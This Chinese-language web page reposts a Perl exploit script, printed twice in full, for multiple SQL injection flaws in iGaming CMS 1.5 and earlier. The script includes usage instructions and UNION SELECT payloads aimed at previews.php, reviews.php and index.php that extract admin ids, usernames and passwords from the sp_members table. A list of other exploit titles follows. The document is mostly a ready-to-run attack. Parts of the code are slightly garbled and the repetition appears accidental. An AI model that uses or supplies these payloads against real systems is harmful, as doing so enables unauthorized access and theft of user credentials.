您现在的位置是:网站首页> 编程资料编程资料
iGaming CMS _Exploit_网络安全_
2023-05-24
559人已围观
简介 iGaming CMS _Exploit_网络安全_
#!/usr/bin/perl
# ----------------------------------------------------------
# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
# Perl Exploit - Output: id:admin:password
# Discovered On: 23/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Proud To Be Italian
# ----------------------------------------------------------
# Usage: perl exploit.pl http://localhost/iGaming
# ---------------------------------------------------------- use strict;
use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";
$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";
$host = shift @ARGV;
$http = new LWP::UserAgent or die $!;
$http->agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);
if($host !~ /^http:\/\/(. ?)$/)
{
print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
print "[?] Usage: perl $0 http://[path]\n";
exit;
}
else
{
$one = $http->get($host.'/previews.php?browse='.$exec);
$two = $http->get($host.'/reviews.php?browse='.$exec);
$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);
if($one->is_success or $two->is_success or $xxx->is_success)
{
die "$1\n" if $one->content =~ /%(. ?)%/;
die "$1\n" if $two->content =~ /%(. ?)%/;
die "$1\n" if $xxx->content =~ /%(. ?)%/;
}
else
{
die "[ ] Exploit Failed!\n";
}
}
# ----------------------------------------------------------
# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
# Perl Exploit - Output: id:admin:password
# Discovered On: 23/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Proud To Be Italian
# ----------------------------------------------------------
# Usage: perl exploit.pl http://localhost/iGaming
# ---------------------------------------------------------- use strict;
use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";
$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";
$host = shift @ARGV;
$http = new LWP::UserAgent or die $!;
$http->agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);
if($host !~ /^http:\/\/(. ?)$/)
{
print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
print "[?] Usage: perl $0 http://[path]\n";
exit;
}
else
{
$one = $http->get($host.'/previews.php?browse='.$exec);
$two = $http->get($host.'/reviews.php?browse='.$exec);
$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);
if($one->is_success or $two->is_success or $xxx->is_success)
{
die "$1\n" if $one->content =~ /%(. ?)%/;
die "$1\n" if $two->content =~ /%(. ?)%/;
die "$1\n" if $xxx->content =~ /%(. ?)%/;
}
else
{
die "[ ] Exploit Failed!\n";
}
}
相关内容
- BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution _Exploit_网络安全_
- ESET Smart Security 3.0.667.0 Privilege Escalation PoC _Exploit_网络安全_
- EO Video 1.36 Local Heap Overflow DOS / PoC _Exploit_网络安全_
- WS_FTP Home/Professional FTP Client Remote Format String PoC _Exploit_网络安全_
- FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh) _Exploit_网络安全_
- webEdition CMS (we_objectID) Blind SQL Injection Exploit _Exploit_网络安全_
- VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability _Exploit_网络安全_
- Anzio Web Print Object _Exploit_网络安全_
- Ultrastats _Exploit_网络安全_
- Mole Group Real Estate Script _Exploit_网络安全_
